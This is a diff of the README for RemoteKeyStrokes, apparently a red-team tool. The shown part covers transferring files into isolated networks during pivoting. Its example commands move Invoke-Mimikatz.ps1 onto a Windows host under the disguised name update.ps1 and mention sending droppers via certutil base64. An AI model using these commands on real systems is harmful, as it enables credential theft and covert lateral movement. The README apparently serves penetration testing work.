U53RW4R3/RemoteKeyStrokes/README.md

 ### File Transfer

 - Transfer a file remotely when pivoting in a isolated network.
 If you want to specify the remote path on windows be sure to include quotes.
 By default it uses Powershell base64 to transfer files if not specified.
-However, there is a limitation for handling a large file.
-The script will you provide suggestion as an alternative if you insist using base64.

 ```
 $ ./rks.sh -c "powershell.exe" -m dialogbox

 $ ./rks.sh -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
 [*] Transferring file...
-[*] Checking one of the lines reaches 3477 character limit
-[-] Character Limit reached!
-[*] Use 'pwshcertutil' as a method instead.
-[*] Terminating program...
+[+] File transferred!
 ```

 - To transfer droppers you can use certutil base64 especially if it's large.
 Keep in mind it'll take time depending the size of the file.